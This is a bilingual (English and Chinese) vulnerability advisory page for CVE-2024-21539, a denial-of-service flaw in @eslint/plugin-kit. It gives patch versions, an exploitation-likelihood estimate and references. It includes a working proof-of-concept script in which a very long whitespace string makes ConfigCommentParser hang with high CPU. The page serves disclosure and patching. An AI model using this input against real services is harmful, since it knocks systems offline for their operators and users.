CVE-2024-21539

描述

Crafting a very large and well crafted string can increase the CPU usage and crash the program. ## POC ```js const { ConfigCommentParser } = require("@eslint/plugin-kit"); var str = ""; for (var i = 0; i < 1000000; i++) { str += " "; } str += "A"; console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseStringConfig(str, "")); console.log("end") // run `npm i @eslint/plugin-kit` and `node attack.js` // then the program will stuck forever with high CPU usage ```

如何修補 CVE-2024-21539

要修補 CVE-2024-21539,請將受影響套件升級到下列已修補版本。

• —升級至 0.2.3 或更新版本

CVE-2024-21539 正在被利用嗎?

低 — EPSS 為 0.2%,目前沒有觀察到大規模利用活動。

受影響套件(1)

• from 0, < 0.2.3

CVSS 分數

參考連結(5)

• ADVISORYnvd.nist.gov/vuln/detail/CVE-2024-21539
• PATCHgithub.com/eslint/rewrite
• WEBgithub.com/eslint/rewrite/commit/071be842f0bd58de4863cdf2ab86d60f49912abf
• WEBgithub.com/eslint/rewrite/security/advisories/GHSA-7q7g-4xm8-89cq